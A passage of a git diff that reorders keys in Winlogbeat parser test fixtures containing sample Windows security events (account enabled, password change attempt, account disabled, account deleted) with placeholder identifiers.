Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json index 34874fdfb..ac581308e 100644 --- a/Beats/winlogbeat/tests/security_event_4723.json +++ b/Beats/winlogbeat/tests/security_event_4723.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json index 31cca5f97..d3826be97 100644 --- a/Beats/winlogbeat/tests/security_event_4725.json +++ b/Beats/winlogbeat/tests/security_event_4725.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json index e147e2eb4..73c1d823c 100644 --- a/Beats/winlogbeat/tests/security_event_4726.json +++ b/Beats/winlogbeat/tests/security_event_4726.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account 